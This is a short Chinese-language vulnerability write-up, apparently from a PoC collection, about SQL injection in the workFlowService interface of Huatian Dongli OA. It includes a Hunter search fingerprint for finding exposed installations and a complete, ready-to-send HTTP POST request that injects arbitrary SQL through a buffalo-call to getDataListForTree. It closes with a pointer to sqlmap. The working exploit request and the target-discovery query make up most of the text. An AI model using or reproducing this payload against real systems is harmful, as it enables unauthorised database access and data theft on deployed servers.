华天动力OA workFlowService SQL注入
一、漏洞简介
华天动力OA workFlowService接口存在SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息。
二、影响版本
- 华天动力OA
三、资产测绘
- hunter
app.name="华天软件 OA" - 特征
四、漏洞复现
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
AAccept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
</buffalo-call>
sqlmap